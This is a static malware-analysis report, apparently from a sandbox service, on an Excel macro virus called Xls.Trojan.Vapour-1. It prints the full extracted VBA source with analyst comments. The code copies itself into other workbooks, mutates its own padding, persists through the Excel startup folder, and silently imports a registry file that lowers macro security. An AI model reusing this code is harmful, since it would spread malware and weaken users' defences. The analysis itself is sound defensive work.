Xls.Trojan.Vapour-1 — Office (OLE) malware analysis

Static analysis result for SHA-256 090262c1fa335691…

MALICIOUS

Office (OLE)

24.5 KB Created: 1999-07-25 12:28:16 Authoring application: Microsoft Excel First seen: 2012-06-14
MD5: 91bedf60ea3b6a685c4f307bf9b8c0bb SHA-1: 71b34c63b85d7cd213c49f3a1418373bf5710681 SHA-256: 090262c1fa335691c7b0f77bbfaf2358925cffae71ccd077fb5738dc9ec9d0a6
200 Risk Score

Malware Insights

Xls.Trojan.Vapour-1 · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The file is an Excel document containing malicious VBA macros. The macros attempt to obfuscate themselves and then use the Shell() function to execute arbitrary code. The script also attempts to write a registry script file (.reg) to 'c:\Windows\Office.reg' and to save a copy of the workbook named 'Book1.' in the Excel startup path, indicating an attempt to establish persistence or download a second-stage payload.

Heuristics 3

  • ClamAV: Xls.Trojan.Vapour-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Trojan.Vapour-1
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 20926 bytes
SHA-256: 0d30b6934462423248cd1230f328214a3188518c49fcb5b98ac7fc7342331fbb
Detection
ClamAV: Xls.Trojan.Vapour-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Sub Workbook_Deactivate()
On Error Resume Next
' Analyst notes (defensive annotation of the extracted sample; the code itself is unchanged).
' Purpose: a self-replicating, self-mutating Excel macro virus. On workbook deactivation it
' copies its own ThisWorkbook module into the active workbook, randomly reshuffles its own
' comment padding (so each copy hashes differently), drops itself into the Excel startup
' folder and silently imports a .reg script through regedit.
' The module addresses its own source by line number (line 2 must read
' "On Error Resume Next"; mutation starts at line 9), so these notes are placed after
' line 2 and the block must not be reflowed or re-indented.
' All errors are swallowed by On Error Resume Next: any step that fails is skipped silently.
'
' --- Stage 1: infect the active workbook's ThisWorkbook module ---
' a/c/B = the active workbook's ThisWorkbook code module; t/i/z = this workbook's own module.
' NOTE(review): on current Office builds VBProject access is blocked unless the user has
' enabled "Trust access to the VBA project object model" - confirm; if blocked, this stage
' fails silently.
Set a = ActiveWorkbook
Set c = a.VBProject.VBComponents("ThisWorkbook")
Set B = c.CodeModule
Set L = B.Lines
Set t = ThisWorkbook
Set i = t.VBProject.VBComponents("ThisWorkbook")
Set z = i.CodeModule
' If the target module's line 2 is not the virus's marker line, wipe the target module and
' replace it with a full copy of this module.
If L(2, 1) <> "On Error Resume Next" Then
B.deletelines 1, B.countoflines
'
B.Insertlines 1, z.Lines(1, z.countoflines)
'
'
'
'
'
'
End If
' --- Stage 2: polymorphic padding of this module (from line 9 onward) ---
' ma is a random integer in 1..4. Each bare "'" line is deleted when ma >= 2 (3 in 4 chance).
For n = 9 To z.countoflines: Randomize
'
'
ma = Int((Rnd * 4) + 1)
If z.Lines(n, 1) = "'" And ma >= 2 Then
'
z.deletelines n, 1
End If: Next n
'
'
'
' Second pass: with ma <= 2 (1 in 2 chance) a "'" line is presumably inserted at line i.
' NOTE(review): "f" is not a CodeModule member name; this looks like a damaged or
' obfuscated call (likely InsertLines) - confirm against the raw stream.
For i = 9 To z.countoflines: Randomize
ma = Int((Rnd * 4) + 1)
If ma <= 2 Then
'
'
z.f i, "'"
'
End If
: Next i
'
'
' --- Stage 3: persistence and macro-security downgrade ---
' If no "Book1." is already present in the Excel startup folder, save this workbook there
' (files in the startup path are opened on every Excel start), then write a .reg script
' assembled from Chr() codes and import it with a hidden "regedit /s".
' Decoded Chr() strings for the Print lines below:
'   REGEDIT4
'   [HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Excel\Microsoft Excel]
'   "Options6"=dword:00000000
'   [HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Excel\Security]
'   "Level"=dword:00000001
' 8.0 = Excel 97, 9.0 = Excel 2000. Security\Level=1 is presumably the "Low" macro security
' setting and Options6=0 presumably clears the Excel 97 macro-virus warning - confirm against
' the Office registry reference. Detection hints: creation of c:\Windows\Office.reg, a new
' file in the Excel startup path, and EXCEL.EXE spawning regedit.exe with /s.
If UCase(Dir(Application.StartupPath + "\Book1.")) <> "BOOK1" Then
ActiveWorkbook.SaveAs Excel.Application.StartupPath & "\Book1."
Open "c:\Windows\Office.reg" For Output As 1
Print #1, Chr(82) + Chr(69) + Chr(71) + Chr(69) + Chr(68) + Chr(73) + Chr(84) + Chr(52)
Print #1, Chr(91) + Chr(72) + Chr(75) + Chr(69) + Chr(89) + Chr(95) + Chr(67) + Chr(85) + Chr(82) + Chr(82) + Chr(69) + Chr(78) + Chr(84) + Chr(95) + Chr(85) + Chr(83) + Chr(69) + Chr(82) + Chr(92) + Chr(83) + Chr(111) + Chr(102) + Chr(116) + Chr(119) + Chr(97) + Chr(114) + Chr(101) + Chr(92) + Chr(77) + Chr(105) + Chr(99) + Chr(114) + Chr(111) + Chr(115) + Chr(111) + Chr(102) + Chr(116) + Chr(92) + Chr(79) + Chr(102) + Chr(102) + Chr(105) + Chr(99) + Chr(101) + Chr(92) + Chr(56) + Chr(46) + Chr(48) + Chr(92) + Chr(69) + Chr(120) + Chr(99) + Chr(101) + Chr(108) + Chr(92) + Chr(77) + Chr(105) + Chr(99) + Chr(114) + Chr(111) + Chr(115) + Chr(111) + Chr(102) + Chr(116) + Chr(32) + Chr(69) + Chr(120) + Chr(99) + Chr(101) + Chr(108) + Chr(93)
Print #1, Chr(34) + Chr(79) + Chr(112) + Chr(116) + Chr(105) + Chr(111) + Chr(110) + Chr(115) + Chr(54) + Chr(34) + Chr(61) + Chr(100) + Chr(119) + Chr(111) + Chr(114) + Chr(100) + Chr(58) + Chr(48) + Chr(48) + Chr(48) + Chr(48) + Chr(48) + Chr(48) + Chr(48) + Chr(48)
Print #1, Chr(91) + Chr(72) + Chr(75) + Chr(69) + Chr(89) + Chr(95) + Chr(67) + Chr(85) + Chr(82) + Chr(82) + Chr(69) + Chr(78) + Chr(84) + Chr(95) + Chr(85) + Chr(83) + Chr(69) + Chr(82) + Chr(92) + Chr(83) + Chr(111) + Chr(102) + Chr(116) + Chr(119) + Chr(97) + Chr(114) + Chr(101) + Chr(92) + Chr(77) + Chr(105) + Chr(99) + Chr(114) + Chr(111) + Chr(115) + Chr(111) + Chr(102) + Chr(116) + Chr(92) + Chr(79) + Chr(102) + Chr(102) + Chr(105) + Chr(99) + Chr(101) + Chr(92) + Chr(57) + Chr(46) + Chr(48) + Chr(92) + Chr(69) + Chr(120) + Chr(99) + Chr(101) + Chr(108) + Chr(92) + Chr(83) + Chr(101) + Chr(99) + Chr(117) + Chr(114) + Chr(105) + Chr(116) + Chr(121) + Chr(93)
Print #1, Chr(34) + Chr(76) + Chr(101) + Chr(118) + Chr(101) + Chr(108) + Chr(34) + Chr(61) + Chr(100) + Chr(119) + Chr(111) + Chr(114) + Chr(100) + Chr(58) + Chr(48) + Chr(48) + Chr(48) + Chr(48) + Chr(48) + Chr(48) + Chr(48) + Chr(49)
Close 1
Shell "regedit /s c:\Windows\Office.reg", vbHide
End If
' --- Stage 4: trigger payload ---
' Fires only when the day of the month equals the current minute. The decoded message is
' "You`ll Forever be a vapour trial in my skies" with the title "VaPoUr TrAiL".
If (Day(Now)) = (Minute(Now)) Then
MsgBox Chr(89) + Chr(111) + Chr(117) + Chr(96) + Chr(108) + Chr(108) + Chr(32) + Chr(70) + Chr(111) + Chr(114) + Chr(101) + Chr(118) + Chr(101) + Chr(114) + Chr(32) + Chr(98) + Chr(101) + Chr(32) + Chr(97) + Chr(32) + Chr(118) + Chr(97) + Chr(112) + Chr(111) + Chr(117) + Chr(114) + Chr(32) + Chr(116) + Chr(114) + Chr(105) + Chr(97) + Chr(108) + Chr(32) + Chr(105) + Chr(110) + Chr(32) + Chr(109) + Chr(121) + Chr(32) + Chr(115) + Chr(107) + Chr(105) + Chr(101) + Chr(115), vbInformation, Chr(86) + Chr(97) + Chr(80) + Chr(111) + Chr(85) + Chr(114) + Chr(32) + Chr(84) + Chr(114) + Chr(65) + Chr(105) + Chr(76)
End If
End Sub


Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute V
... (truncated)